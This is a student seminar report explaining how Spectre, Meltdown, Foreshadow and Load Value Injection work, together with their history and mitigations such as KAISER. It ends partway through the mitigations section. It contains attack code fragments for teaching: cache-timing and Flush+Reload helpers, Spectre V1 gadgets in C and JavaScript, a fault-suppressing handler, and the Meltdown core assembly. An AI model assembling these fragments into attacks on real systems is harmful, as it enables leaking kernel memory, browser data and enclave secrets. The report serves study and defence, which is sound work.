Seminar Report: Embedded Systems, Summer Term 2020

Spectre & Meltdown: A tamed ghost?

Jonas Zeunert Technische Universität Kaiserslautern, Department of Computer Science

Note: This report is a compilation of publications on the topic, produced as part of a student seminar. It does not claim to introduce original work, and all sources are properly cited.

Spectre and Meltdown are security attacks against the fundamental principles of out-of-order and speculative execution in processors dating back to 1996. Even though many people have heard about their impact, their principles are often unknown, although they are not that hard to understand with a bit of background knowledge. Since programmers are responsible for the security of their own code, it is important for them to understand exactly at which points their code is attackable through Spectre vulnerabilities. In this seminar we therefore take a detailed look at the principles and techniques used by Spectre and Meltdown attacks.

1 Introduction

In this seminar we will look at the security vulnerabilities Spectre and Meltdown. They are the first practical examples of hardware-based side-channel attacks against arbitrary software and were found in 2018 independently by Google's Project Zero and by Kocher et al. [15]. Spectre is, as of today, still not fully mitigated, since new variants keep appearing, while the mitigations which solve the problem behind Meltdown are sometimes disabled because of their performance impact.

These attacks completely shifted the general awareness of hardware-based attacks, since they are easily exploitable even via web browsers, whereas previously side-channel attacks were seen as an attack vector only for breaking cryptographic systems in an academic setting, not for breaking arbitrary systems. Their ability to bypass the protection of virtual machines or sandboxes makes them extremely relevant in view of the continuously growing cloud computing market, and they are therefore a big threat to all such systems.

We try to get an understanding of the history of the attacks, their impact, their functionality and their mitigations, and try to answer the question whether this new ghost that appeared in the security realm has been tamed by the measures taken until today, or whether it is something that will haunt us for a much longer time.

The rest of this paper is structured as follows: First, section 2 provides the necessary technical background. This covers the basics of side-channel attacks, speculative execution and other concepts needed to understand the attacks. Section 3 then covers the history and evolution of the attacks: how the first side-channel attacks were discovered, how everything evolved to today's state, and an attempt to classify their impact. Section 4 takes a look at the actual idea behind Spectre and Meltdown and how they work. Afterwards, section 5 discusses possible mitigations from both a software (5.1) and a hardware (5.2) perspective. Finally, section 6 discusses whether it was possible to tame the ghost introduced with Spectre and Meltdown or not.

2 Technical Background

Before describing how Spectre and Meltdown work in detail, it is necessary to understand the underlying techniques which are combined in Spectre-like attacks.

In this section we will take a look at the principles of caches, side-channel attacks, out-of-order execution and branch prediction.

2.1 CPU Cache A CPU cache is a small but very fast memory in a computer system, located near the execution units of the CPU. Its main purpose is to cache frequently used data so that the data does not have to be read from and written back to main memory immediately, which is the biggest bottleneck in computation for von Neumann machines.

Modern CPUs typically have three levels of caches; the levels closer to the ALU allow faster accesses but are smaller. As an example of a modern cache structure, an AMD Ryzen 9 3900 [2] has 32 KB of level 1 cache and 512 KB of level 2 cache for every single core. The level 3 cache is typically shared between all cores and has about 64 MiB.

A cache is organized in lines and sets. A line contains multiple bytes of data, and the lines are grouped into sets. This organization determines which cache lines a given main-memory address can be placed in and is important to understand for the different side-channel attacks.
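To illustrate this mapping, the following minimal C sketch splits an address into line offset, set index and tag, assuming an example geometry of 64-byte lines and 64 sets (illustrative values, not those of a specific CPU):

#include <stdint.h>
#include <stdio.h>

/* Assumed example geometry: 64-byte lines, 64 sets (not tied to a real CPU). */
#define LINE_SIZE 64
#define NUM_SETS  64

int main(void) {
    uintptr_t addr = 0x7ffd1234abcdULL;   /* example 64-bit address */

    uintptr_t offset = addr % LINE_SIZE;               /* byte within the line   */
    uintptr_t set    = (addr / LINE_SIZE) % NUM_SETS;  /* which set it maps into */
    uintptr_t tag    = addr / (LINE_SIZE * NUM_SETS);  /* identifies the line    */

    printf("offset=%lu set=%lu tag=%#lx\n",
           (unsigned long)offset, (unsigned long)set, (unsigned long)tag);
    return 0;
}

Every address whose set index matches can only be cached in the lines of that one set, which is exactly the property that attacks such as Prime+Probe (section 2.3.3) exploit.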

2.2 Side-channel attacks Let us first get a definition for the term:

A side-channel attack is an attack enabled by leakage of information from a physical cryptosystem by an unintended channel. Characteristics that could be exploited in a side-channel attack include timing, power consumption, and electromagnetic and acoustic emissions. [22]

So we see that for a side-channel attack it is important that some (here cryptographic) information is leaked over a channel that was not intended to leak information. Often the channel, such as power consumption, is not even intended to communicate any information at all.

Standaert [25] goes further and subdivides side-channel attacks into invasive vs. non-invasive and active vs. passive. (Non-)invasive describes whether the attack requires direct access to the physical chip, while active vs. passive distinguishes whether the attack changes the functionality of the original algorithm or not. To give an example, different attacks are classified in this scheme in figure 1.

Active, Invasive: Inducing signals on a device to get back information
Active, Non-Invasive: Flipping bits via a technique like Rowhammer [13] to break page separation
Passive, Invasive: Sensing the data on the DRAM bus
Passive, Non-Invasive: Sensing electromagnetic signals emitted by a machine

Figure 1: Examples of the side-channel classification according to Standaert (2010) [25]

Since this domain is really large, we will concentrate in this paper on the non-invasive techniques of cache-based side-channel attacks, which are the essential building blocks behind Spectre and also Meltdown.

2.3 Cache based side-channel attacks Cache-based side-channel attacks can be classified with the scheme above as non-invasive passive attacks. Since they are only based on accessing the cache, which does not require any direct physical interaction, they are non-invasive, and even though they manipulate the cache, this does not directly change the behaviour of any program, so they are also passive.

Most often they rely on the ability of the cache to decrease the time of memory accesses, which are, as of today, really slow in comparison to accesses to registers located near the execution units. If a given piece of data is already in the cache, the execution of an algorithm is much faster than if it were not. This timing difference allows an attacker to draw conclusions about the accessed address and therefore about the actual data, given that the algorithm is known.
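A minimal sketch of this timing primitive on x86, using the rdtscp and fence intrinsics from <x86intrin.h> (GCC/Clang-specific); the attacker compares the measured cycle count against a machine-dependent threshold he has calibrated beforehand:

#include <stdint.h>
#include <x86intrin.h>   /* __rdtscp, _mm_mfence */

/* Measure how long one load from *addr takes, in time-stamp-counter cycles. */
uint64_t measure_access(volatile uint8_t *addr) {
    unsigned int aux;
    _mm_mfence();                      /* serialize earlier memory traffic */
    uint64_t start = __rdtscp(&aux);   /* timestamp before the load        */
    (void)*addr;                       /* the load we want to time         */
    uint64_t end = __rdtscp(&aux);     /* timestamp after the load         */
    return end - start;                /* small: cache hit, large: miss    */
}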

Even though many cache-based side-channel attacks are known today, it is sufficient to concentrate on the following three, which are also used by Kocher et al. [15] in the original Spectre paper: Flush+Reload (2.3.1), Evict+Reload (2.3.2) and Prime+Probe (2.3.3).

2.3.1 Flush+Reload Flush+Reload, described by Yarom et al. [29], is an attack which uses the clflush instruction of the x86 processor architecture, which flushes a given cache line from all three cache levels. It also relies on the ability of modern operating systems to share memory pages between processes and, in its more aggressive form, on memory de-duplication, where pages with identical content are shared.

Basically, Flush+Reload works in three phases:
1. Flush the observed cache line with clflush
2. Wait for the victim to access the cache line
3. Probe the cache line by timing a read of the shared memory that maps to it; a fast read means the victim accessed the line
The most critical part is the wait time: if one probes too early, too late, or at the same time as the victim, information can be missed. Also, this only works if the memory pages are shared, so an attacker can for example only observe accesses into a shared library that is mapped into both processes.
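A minimal sketch of one Flush+Reload round, reusing the measure_access helper from above and assuming that shared points into a page shared with the victim; the busy-wait loop and the 100-cycle threshold are only illustrative assumptions:

#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence */

uint64_t measure_access(volatile uint8_t *addr);   /* timing helper from above */

/* One Flush+Reload round on a single shared cache line.
 * Returns 1 if the victim touched the line while we waited, 0 otherwise. */
int flush_reload_round(volatile uint8_t *shared) {
    _mm_clflush((const void *)shared);   /* 1. flush the monitored line        */
    _mm_mfence();
    for (volatile int i = 0; i < 100000; i++) { }  /* 2. wait for the victim   */
    /* 3. reload and time it: fast means the victim brought the line back in   */
    return measure_access(shared) < 100;
}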

2.3.2 Evict+Reload Evict+Reload is a development of Flush+Reload by Gruss et al. [11]. It generalizes the approach so that not only specific binaries can be attacked, but arbitrary information can be read from caches. The attack is based on templates which are automatically generated by profiling the cache-hit ratio of a specific event, such as a keystroke, which the attacker wants to catch. This generated template is afterwards matched against the timings of other program instantiations, and the attacker is able to detect arbitrary events that he has profiled.

2.3.3 Prime+Probe Prime+Probe, first described by Osvik et al. [21] in 2006 as a first-level cache attack against AES, was further investigated by Liu et al. [18] in 2015, who showed that this attack is also practical on last-level caches. As an example, this can be useful to extract data between virtual machines. The idea behind Prime+Probe is that an attacker first primes the cache by filling every cache line with his own data, then idles for a while, and finally probes which cache lines have been replaced, from which he can draw conclusions about which memory addresses were accessed.
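A heavily simplified sketch of priming and probing a single cache set, reusing the measure_access helper from above; it assumes an L1 data cache with 64 sets, 64-byte lines and 8 ways, that the virtual address determines the set index, and the same illustrative 100-cycle threshold (real attacks additionally need eviction-set construction and noise handling):

#include <stdint.h>

#define LINE_SIZE  64
#define NUM_SETS   64
#define NUM_WAYS   8
#define SET_STRIDE (LINE_SIZE * NUM_SETS)   /* addresses this far apart share a set */

uint64_t measure_access(volatile uint8_t *addr);   /* timing helper from above */

/* buf must be at least NUM_WAYS * SET_STRIDE bytes. */
void prime_set(volatile uint8_t *buf, int set) {
    for (int way = 0; way < NUM_WAYS; way++)            /* fill all ways of the set */
        (void)buf[way * SET_STRIDE + set * LINE_SIZE];
}

/* Counts how many of our lines were evicted while we waited, i.e. a hint
 * that the victim accessed this cache set in the meantime. */
int probe_set(volatile uint8_t *buf, int set) {
    int evicted = 0;
    for (int way = 0; way < NUM_WAYS; way++)
        if (measure_access(&buf[way * SET_STRIDE + set * LINE_SIZE]) > 100)
            evicted++;
    return evicted;
}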

With this information an attacker can easily draw conclusions about a secret value in a specific implementation, e.g. a specific GnuPG implementation, and sometimes this is enough to restore the whole secret.

2.4 Out-of-order execution Out-of-order execution is another technique that has been used for many years to speed up computation by executing code not strictly in the order in which it is programmed and compiled. If some instructions do not have any dependencies and multiple Arithmetic Logic Units (ALUs) are at one's disposal, it is possible to run them in parallel at the micro-architectural level.

But the most important thing about out-of-order execution is that it must be transparent with respect to the original intent of the code. From the perspective of a programmer it should look as if the code were executed in order, and there should be no hazards.

2.5 Branch prediction One of the biggest speed improvements in today's processors was the invention of branch prediction, which enables speculative execution. It increases the flow of data in multi-stage pipelines by filling the "holes" which arise due to conditional branches in code.

In more detail: if there is a conditional branch, the processor typically has to stall its execution until it knows the outcome of the branch before it can continue with further instructions. This creates bubbles in the pipeline, which hurts performance since the processor cannot do anything useful in these cycles. Therefore the branch predictor of the CPU predicts the outcome with a given strategy (which could be, for example, "always take the branch") and continues computing as if the prediction were true. When the real result of the branch arrives, it either discards all calculations if the prediction was wrong, or otherwise it has saved a lot of cycles. This is especially important in the case of loop branches, where a good prediction can have a big performance impact.

A loop which often appears in code is the one seen in figure 2¹, written exemplarily in C. As one can easily see, the loop condition will be true 100 times, so the strategy of always predicting the branch as taken would lead to only a single misprediction, at the 101st evaluation, while otherwise the CPU can execute the iterations in parallel on as many execution units as it has at hand.

for (int i = 0; i < 100; i++) {
    array[i] = i;
}

Figure 2: Example loop which can be accelerated by branch prediction.

¹ In real environments any compiler would speed up this loop by simply unrolling it, which would then be accelerated further by out-of-order execution.

Modern CPUs have a dynamic branch predictor which trains itself on the branches already taken in the past. So, as an example, if a given branch was taken the last ten times, it is likely that it will also be taken the eleventh time. It is very important that all traces of this speculative behaviour, such as registers and stalled memory write-backs, are revoked if the prediction turns out to be false, and the same should hold for the caches. The last does not happen, and this is what enables Spectre- and Meltdown-like attacks.
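To illustrate such self-training, the following sketch models a single 2-bit saturating counter, a common textbook prediction scheme; real CPUs use far more elaborate and undocumented predictors:

/* 2-bit saturating counter: states 0,1 predict "not taken"; 2,3 predict "taken". */
typedef struct { int state; } predictor_t;

int predict_taken(const predictor_t *p) {
    return p->state >= 2;                     /* 1 = predict "taken" */
}

void train(predictor_t *p, int taken) {
    if (taken  && p->state < 3) p->state++;   /* reinforce "taken"     */
    if (!taken && p->state > 0) p->state--;   /* reinforce "not taken" */
}

After a branch has been taken a few times in a row, the counter saturates and keeps predicting "taken", which is exactly the behaviour an attacker relies on when training the predictor for a Spectre attack.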

2.6 Return-oriented programming Return-oriented programming is a technique for exploiting buffer-overflow vulnerabilities in the presence of security mechanisms like W^X or Address Space Layout Randomization (ASLR). In an unsecured environment the attacker would overflow the stack with the payload he wants to have executed. Since several defense mechanisms prevent such attacks, with return-oriented programming the attacker only overwrites the function's return address, which is normally pushed onto the stack, and tries to find so-called "gadgets" in the existing code to jump to, where he can either execute suitable instruction sequences or call a library function which loads his own code. By chaining such gadgets it is possible to execute arbitrary code.

3 History and Evolution

The first academically known side-channel attack in modern times, code-named "Tempest", reaches back to 1943, when a researcher at Bell Telephone Laboratories discovered that the operation of a cryptographic typewriter caused spikes on a nearby oscilloscope which could be translated back into the transmitted message. [6]

Afterwards the topic's attention faded a bit until Paul Kocher released his paper "Timing Attacks on Implementations of Diffie-Hellman, RSA, DSS and Other Systems" in 1996 [16], which brought attention back to this type of attack. There was much speculation about how these types of attacks could be made practical until, in 2003, Tsunoo et al. [26] showed how to successfully reduce the complexity of breaking the Data Encryption Standard (DES), the widely used encryption standard of that time, with cache attacks.

Afterwards, many different ways to use side channels such as electromagnetic radiation, power consumption or micro-architectural caches were found, which finally led to the until now biggest part of this history: the release of Spectre and Meltdown, found at the same time by Kocher et al. [15] and Lipp et al. [17] and by Jann Horn of Google Project Zero.

This finally opened Pandora's box, because afterwards many similar attacks were found and new variants are continuously being released. These include eight different attacks called Spectre-NG, which were first reported by the German computer magazine c't in May 2018 [12]. These are different attacks exploiting speculative execution like Spectre, but with very different characteristics: in one of them the attacker does not need control over any memory of the attacked program, and in the case of NetSpectre [24], released in July 2018, the attacker does not even need to run code on the remote machine at all but only uses common network functionality.

In August 2018 another big attack called Foreshadow (found in January 2018 by Van Bulck et al. [27]) was released, which, even though similar to Spectre, attacks the SGX enclave of Intel processors, which was until this point in time considered a totally secure execution platform for holding secrets that even the machine's owner should not be able to access.

Furthermore, in 2020 Load Value Injection was discovered by Van Bulck et al. [28], which combines the faults of Intel processors with the techniques of Spectre to inject attacker-controlled data into arbitrary load instructions of a victim.

Most recently, in August 2020, the researchers behind the Foreshadow attack published a comment stating that all mitigations against the Spectre attacks were built on a false understanding of the principles behind them, and that until the fundamental problems are fixed there will always be new Spectre-like attacks. [4]

3.1 Impact As we have seen in the previous section, the discovery of Spectre and Meltdown has brought a lot of attention to the topic of side-channel attacks and speculative execution. It completely discarded the common assumption that the underlying hardware executes correctly and that attacks against it are only of academic nature. Before that, security researchers mostly focused on finding and exploiting bugs in software.

Figure 3: Evolution of Spectre-like security flaws as shown in "A Systematic Evaluation of Transient Execution Attacks and Defenses" by Canella et al. [3]

The original Spectre and Meltdown papers led to a wide range of similar attacks, as shown in figure 3. The figure describes the authors' systematic analysis of Spectre and Meltdown attacks. Since so many varieties of them appeared after the initial release, they tried a systematic approach to find all possible combinations of the attacks. The ones highlighted in blue are the already existing attacks and the ones in red are the ones which should be possible but have not been researched yet.

Since speculative execution has been present in commercial CPUs dating back to the 1990s and the Meltdown vulnerability affects Intel processors starting from 2011, fixing these problems in hardware will require replacing nearly every CPU that is in use today, and one can easily imagine how long something like this will take once we finally have a processor architecture that is not vulnerable to Spectre attacks.

Besides the circumstance that they brought a totally new attack vector on computer systems into the game, their mitigations also have an impact of their own, which becomes especially relevant in large-scale data centers. The performance hit depends strongly on the hardware configuration as well as on the algorithms used, since most patches change the microcode of the processor. [14] So one cannot derive a simple formula like patch = performance_impact%, but it is possible to say that the performance impact of the patches lies somewhere between 1% and 20%, which is less than the initially feared 40%-60%, but still enough that it is often weighed whether fully mitigating the vulnerabilities is worthwhile.

4 Functionality

Spectre as well as Meltdown² work by exploiting some form of out-of-order or speculative execution which leaves unintended traces in processor caches. While Spectre is an attack against binaries that works by finding specific usable gadgets, Meltdown is more of a fault attack against the implementation of Intel processors and some ARM processors.

Both of them detect traces in the CPU's cache left by out-of-order execution. These traces exist because speculatively executed operations are only reverted in memory, registers and pipelines, but not in the caches, since the cache is a separate unit of the CPU and is not informed that some operation was reverted. This creates a side channel which can be read out by an attacker.

So in general these attacks can be split up into three main steps:

1. Bring the cache into a homogeneous state
2. Trick the CPU into speculatively executing something not intended
3. Read out the data left over in the cache through timing attacks

We will discuss this general approach in more detail by investigating the main variants of these vulnerabilities: Spectre V1 (4.1.1), Spectre V2 (4.1.2), Meltdown (4.2), Foreshadow (4.3), which is a development of Meltdown, and Load Value Injection (4.4), which combines the approaches.

² Which is sometimes also called Spectre V3 because of its similarities

4.1 Spectre As already stated, Spectre is an attack against a binary, so in order to leak information one has to analyze a program (most often a shared library) and find specific instruction sequences. The main point is that these instructions somehow need to access memory and therefore also alter the cache, as an x86 "mov" instruction does. Also, there must be some kind of speculative execution involved: for Spectre V1 it is just a conditional branch, while Spectre V2 uses indirect branches, which also trigger speculative execution and occur in almost every program.

Even though there are many more variants of Spectre, which all exploit a different behaviour of programs in their own way, it is sufficient to understand the two released in the first paper, which, even though not the most sophisticated ones, give a good understanding of what went wrong. The first variant, called Spectre V1, exploits the misprediction of conditional branches. The second variant (Spectre V2) exploits the poisoning of indirect branches. Both will be discussed in the following sections.

4.1.1 Exploiting Conditional Branch Misprediction (Spectre V1) Let us look in detail at how a Spectre V1 exploitation works. For Spectre V1 the code flow must contain a conditional branch whose speculative execution can be exploited. In figure 4 we see a typical code sequence that can be misused for Spectre V1 attacks and which an attacker could find in a shared library, in kernel code, or maybe in the implementation of a browser where he can execute some JavaScript.

In general such an attack includes the following steps: First, the attacker trains the branch predictor by calling the function multiple times with an in-bounds value of x. This leads to a situation where the CPU assumes that the conditional branch is always true and assumes this also for the next call. Afterwards it is necessary to bring the cache into a homogeneous state known to the attacker, either by flushing it with the clflush instruction on x86 machines or by filling it with known data, in order to start a Flush+Reload or, correspondingly, a Prime+Probe attack after the speculative execution. Then the attack begins and the function is called with an out-of-bounds value of x. Since the branch predictor has been trained to assume the branch is true, and the cache has been flushed so that array1_size is not cached, the CPU speculatively executes the next line while waiting for the size of array1, loading array2[array1[x] * 256] into the cache. When the value of array1_size arrives, everything gets reverted, but the attacker can start probing array2. So he checks the read timings of array2 for all 256 possible byte values. Only a single one of these accesses will be fast, and its index is the value of array1[x], which was not known to the attacker beforehand.

Even though this attack requires a comprehensive understanding of the attacked software, it is more than viable for widely used software like web browsers, operating systems or safety-critical systems like encryption software.

if (x < array1_size)
    y = array2[array1[x] * 256];

Figure 4: A typical Spectre V1 code flow where the attacker is in control of x.

To also show such an approach, figure 5 gives an example implementation of how Spectre can even be exploited in a scripting language like JavaScript, which can be used to bypass the sandboxing of modern browsers.

if (index < simpleByteArray.length) {
  index = simpleByteArray[index | 0];
  index = (((index * TABLE1_STRIDE)|0) & (TABLE1_BYTES-1))|0;
  localJunk ^= probeTable[index|0]|0;
}

Figure 5: Implementation of a Spectre V1 attack in JavaScript.

In the example the constant TABLE1_STRIDE is 4096 and TABLE1_BYTES is 2^25. So first the branch predictor is trained by calling this code snippet about 1000 times with in-range values and then, in the last call, with a value out of bounds. The variable localJunk is only there so that the JavaScript JIT compiler does not optimize the operations away, and the "|0" hints to it that the resulting value is an integer. With this the speculative execution is triggered, and afterwards the value has to be read out, which is not that simple in JavaScript since there is no instruction like CLFLUSH that can be called. But the cache can also be evicted by reading a series of addresses at 4096-byte intervals from a large array. Afterwards the secret value can be read out from the cache status of probeTable[n*4096] with n in the interval [0, 256).

4.1.2 Poisoning Indirect Branches

Poisoning indirect branches, also known as Spectre V2, is a technique that is more general than exploiting conditional branches, since it does not rely on a specific vulnerable conditional branch but instead abuses indirect branches, which for example arise from calls through function pointers, virtual function calls and function returns. More often than not, a jump to a function in program code depends on a register or memory value. So when the attacker is able to evict that value from the cache before the indirect jump, the CPU begins speculating about the target and executes the code at whatever target its branch predictor supplies. Most often this is limited to the memory range of the victim process, but it can lead to situations where execution takes directions which would never occur in the normal program flow.

class Base {
 public:
  virtual void Foo() = 0;
};

class Derived : public Base {
 public:
  void Foo() override { /* ... */ }
};

Base* obj = new Derived;
obj->Foo();

Figure 6: Example C++ code which leads to an indirect branch which could be exploited for Spectre V2.

A C++ example which gives an idea of when an indirect branch occurs is given in figure 6. When overriding a virtual function of a base class and accessing it only through a pointer to the base class, the system has to look up the address of the function in the virtual function table, since it is not known at compile time. The resulting indirect branch can be exploited by an attacker to load arbitrary data from the program into the cache while the CPU is waiting for the real address.

To better predict such indirect branches, the CPU's branch predictor utilizes the branch target buffer and the branch history, which keep track of indirect jumps and their targets. The attacker trains them beforehand by performing carefully chosen branches himself, thus tricking the predictor into a speculative jump to a gadget not intended by the original program. From there, load instructions are executed which somehow alter the state of the cache. This procedure is somewhat similar to the return-oriented programming described above, and even though the executed sequence is limited in its execution time, it neither needs to terminate cleanly, since the CPU revokes the speculative execution, nor does it leave traces, because the attacked information is received via side channels.

The rest of the attack works similarly to Spectre V1, by reading out the traces left in the cache with cache-based side-channel attacks.

4.2 Meltdown Meltdown, sometimes also called Spectre V3, found by Lipp et al. in 2018 [17], is an attack which works on Intel processors dating back to 2011 and on some ARM processors. It focuses on reading kernel memory from an arbitrary user-space process by exploiting architectural faults in these processors. The main flaw behind Meltdown is the assumption that reverting everything when an out-of-order execution gets discarded due to an exception is sufficient; the permission check is therefore not enforced before the data is forwarded to subsequent transiently executed instructions, and arbitrary addresses can be read.

raise_exception();
// the line below is never reached
access(probe_array[data * 4096]);

Figure 7: A pseudo-code example of the mechanism of Meltdown.

We can analyze this behaviour with the simple pseudo-code example in figure 7, which shows what goes wrong in a CPU when a Meltdown attack is executed. In affected processors, when an exception occurs, the next instruction may nevertheless already have been executed because of out-of-order execution. Even though the results get reverted in memory and registers, this does not happen in the cache, due to the fact that it is its own subsystem, and an attacker can read it out through a cache-based side-channel attack such as Prime+Probe (2.3.3). Meltdown bypasses all software and hardware defense features that were implemented up to the day of its release, such as (Kernel) Address Space Layout Randomization ((K)ASLR) or CPU-based features like Supervisor Mode Access Prevention (SMAP) or No-Execute (NX).

Figure 8: Physical memory is completely mapped with an offset in kernel-space as seen on the blue address.

To see why arbitrary addresses can be read out, figure 8 shows that all physical addresses are mapped into kernel-space, because the kernel typically has to perform actions on user memory pages.

To go into more detail: when we read arbitrary memory that is not in our address range, an exception is triggered in the kernel, which handles the segmentation fault by terminating the process that tried to read the protected memory. Therefore this behaviour must be handled by the attacking process, otherwise it gets terminated. There are two different possibilities to handle this:

The first, trivial approach is to handle the exception by forking the attacking process just before the memory access. The forked child gets killed, and the attacking process can thereafter read out the leaked value from the cache. Since forking is a bit costly, it is usually better to just install a signal handler that handles the fault.
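A minimal sketch of the signal-handler variant on Linux, using sigsetjmp/siglongjmp to survive the SIGSEGV caused by the faulting read; the kernel address and the probe-array readout are placeholders and would follow the Meltdown sequence described below:

#include <setjmp.h>
#include <signal.h>
#include <stdint.h>

static sigjmp_buf recovery_point;

/* Jump back to the recovery point instead of letting the process die. */
static void segfault_handler(int sig) {
    (void)sig;
    siglongjmp(recovery_point, 1);
}

void attempt_illegal_read(volatile const uint8_t *kernel_addr,
                          volatile uint8_t *probe_array) {
    struct sigaction sa;
    sa.sa_handler = segfault_handler;
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = 0;
    sigaction(SIGSEGV, &sa, NULL);

    if (sigsetjmp(recovery_point, 1) == 0) {
        /* Faults architecturally, but the next line may run transiently. */
        uint8_t secret = *kernel_addr;
        (void)probe_array[secret * 4096];
    }
    /* Execution continues here after the handler fired; the attacker can
     * now Flush+Reload the probe array as described in section 2.3.1.   */
}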

The other approach is to trick the processor into only speculatively executing the memory read by putting it behind a branch and training the branch predictor to take that branch. This leads to a situation where the exception is suppressed, since the faulting access happens only transiently and is unwound when the normal execution flow continues.

Combining all this, the Meltdown procedure is as follows:

1. An arbitrary memory address which is inaccessible to the attacker is read into a register
2. Based on the value at that address, a line of a probe array is loaded into the cache, and the occurring exception is handled
3. With Flush+Reload the content of the probe array is read out by the attacker
The above can be repeated with arbitrary memory addresses, so that in the end an attacker is able to read out the whole physical memory of a system.

The attack usually translates to the assembler sequence shown in figure 9, which is the core sequence of Meltdown attacks.

1 ; rcx = kernel address
2 ; rbx = probe array
3 retry:
4 mov al, byte [rcx]
5 shl rax, 0xc
6 jz retry
7 mov rbx, qword [rbx + rax]

Figure 9: Core instruction sequence of Meltdown.

Register RCX holds the kernel address which should be read out, and RBX points to the probe array which constructs the side channel. In line 4 the byte at the kernel address in RCX gets loaded into AL (which represents the least significant byte of RAX). The left shift in line 5 and the retry loop keep the pipeline utilized as much as possible, which delays the handling of the illegal access as long as possible. The access leads to an exception, but there is a race condition between the raising of the exception and the transmission of the secret in line 7. The shift in line 5 multiplies the read value by the page size, and line 7 uses the result as an index into the probe array. With a page size of 4 KB, the probe array is 256 x 4096 bytes for reading a single byte; this ensures that memory pre-fetching does not load neighboring entries and create noise when reading out the value. Through the access in line 7, the corresponding line of the probe array in RBX gets loaded into the cache.

On the micro-architectural level, the instruction in line 7 races against the exception, and even though everything gets reverted afterwards, there is a high probability that the load indexed through RAX wins this race. The attacker then just has to probe the access timings of the probe array to find which entry is cached, and thereby obtains the value at the read kernel address.

Since every physical address is somehow mapped into kernel memory, the above steps just have to be repeated for every possible address, and it is possible to read out the whole memory at a bandwidth of about 3.2 KB/s up to 503 KB/s.

4.3 Foreshadow

Foreshadow, discovered by Van Bulck et al. [27], is, like Meltdown, an attack only viable on Intel CPUs and especially targets the secure enclave SGX, which is a feature to protect the execution of user software. It allows an attacker not only to read out the whole memory of the enclave (which should not be possible) but also to steal its private key and with this to break it completely.

The attack works similarly to Meltdown and exploits what Intel calls an "L1 Terminal Fault". The problem in attacking SGX memory lies in the fact that an unprivileged access to it does not raise an exception as in Meltdown; instead the read value is replaced by a dummy value. Therefore the race condition between exception and memory read used by Meltdown cannot be exploited directly. To counter this, the authors revoke all access to the page they want to read with a call to mprotect. This clears the present bit of the page-table entry, so an exception is thrown while the real value still lies in the L1 cache, from where it can be read out through a side channel like Flush+Reload, as in the Meltdown attack.
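A tiny sketch of this page-access-revocation step on Linux, using the standard mprotect system call; the page address and the 4 KiB size are illustrative, and the enclave setup as well as the subsequent transient read are omitted:

#include <sys/mman.h>

/* Revoke all access rights to one 4 KiB page: on Linux this results in the
 * page being marked not present, so later accesses to it fault. */
int revoke_page_access(void *page_aligned_addr) {
    return mprotect(page_aligned_addr, 4096, PROT_NONE);
}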

4.4 Load Value Injection

Load Value Injection, most recently researched by Van Bulck et al. [28] in 2020, is a technique which combines Spectre-like code gadgets with Meltdown-type data leakage. The attack proceeds entirely within the victim's address space and with this bypasses most of the mitigations against Meltdown, like KAISER, which will be explained in section 5.1.1.

The general approach can be seen in figure 10. An illegal value controlled by the attacker is loaded into a micro-architectural buffer, which prepares the attack. As a result, when the victim tries to access a value B, the attacker's value A is illegally served from the buffer instead. The CPU then transiently executes instructions depending on the injected value, for example the gadget which lies at A.

Figure 10: The general approach of LVI as shown in "LVI: Hijacking Transient Execution through Microarchitectural Load Value Injection" [28]

A toy example of what kind of code structure is needed can be seen in figure 11: first, in line 2, an attacker-controlled value is stored, and afterwards a page fault occurs when dereferencing the double pointer in line 3, which leads to the transient use of the attacker's value.

1 void call_victim(size_t untrusted_arg) {
2     *arg_copy = untrusted_arg;
3     array[**trusted_ptr * 4096];
4 }

Figure 11: Example of LVI attackable code.

The authors state that every load instruction can potentially be turned into an LVI attack, and that a defense against this attack requires an orthogonal approach which combines defenses against both Spectre and Meltdown.

5 Mitigations

There are several mitigations which were developed and applied to operating systems, compilers and software directly upon the release of the vulnerabilities, thanks to the responsible-disclosure period. Some of them caused big trouble early on and had to be reverted and revised, like the first Meltdown patch for Microsoft Windows 7, which even enabled an attacker to write to arbitrary memory regions. [7] The mitigations protect against the most critical parts of the attacks described in the papers, but it has been claimed multiple times that they do not solve the underlying issues of Spectre and Meltdown, which can only be fixed in hardware, something that has not happened to this day.

In general one can classify the mitigations into three kinds: [23]

1. Reducing the accuracy of covert-channel communication up to eliminating it, or making gadgets unavailable, which for example was done by web-browser manufacturers (5.1.4)
2. Aborting or preventing transient execution when accessing secrets (as an example here we can take retpoline, 5.1.3)
3. Ensuring that secret data is unavailable, which is what the KAISER patch (5.1.1) does

In this chapter we will discuss the software patches KAISER (5.1.1) and retpoline (5.1.3), which help protect software against data leakage, and also discuss a complete in-hardware approach to finally fix the issues.

5.1 Software Mitigations 5.1.1 KAISER KAISER, developed by Gruss et al. [10], is an operating-system patch mitigating only the Meltdown vulnerability by removing the mapping of kernel memory from the user-space address space. This strictly separates user-space from kernel-space, and therefore it is no longer possible to leak kernel data through Meltdown.

It is a development of KASLR, which hardens the exploitation of bugs by randomizing the kernel memory layout, and it is also recommended by the authors of the Meltdown paper to be implemented in all operating-system kernels.

There are several challenges to overcome when isolating the memory ranges of user-space and kernel-space. The first problem are threads, which are heavily used in modern parallelized programming, because if the memory page structure is modified upon a context switch, this affects all other threads running in the same program. Furthermore, there are several memory regions which must be shared between kernel-space and user-space, and completely unmapping user-space from kernel-space would require rewriting most parts of current kernels.

The last challenge is more of a performance issue, because switching the address space requires the Translation Lookaside Buffer (TLB), the cache which manages the mapping of virtual to physical memory addresses, to be flushed, which is a quite expensive operation and is nowadays optimized to happen as rarely as possible.

KAISER is a patch which overcomes these challenges through multiple different approaches while reducing the overhead to a performance impact of only 0.28%.

To overcome the first problem they introduce shadow address spaces, which maintain the parallel kernel and user-space mappings by giving every process two separate address spaces that are switched as needed on a context switch by updating the corresponding register CR3. The second problem is solved by KAISER by only keeping the most necessary memory regions of kernel-space mapped into user-space and vice versa. These include the Interrupt Descriptor Table, the Global Descriptor Table, the Task State Segment and finally the kernel thread stacks. Even though kernel-space is nearly entirely removed from user-space, the same does not apply to user-space memory in kernel-space. The authors found removing it impractical, since most operating systems rely on this mapping, and instead followed the approach of making user-space memory non-executable in kernel-space. Furthermore, they have disabled the global bit of kernel pages in the TLB, which according to them has no performance impact and, together with the shadow address spaces, provides complete protection against leaking memory from kernel-space. The switches between the shadow address spaces do not require flushing the TLB, and with this the performance impact is minimized.

Because of its small performance impact and its complete protection against Meltdown³, which does not even require recompiling any software, this patch is, as of today, applied to most modern operating systems.

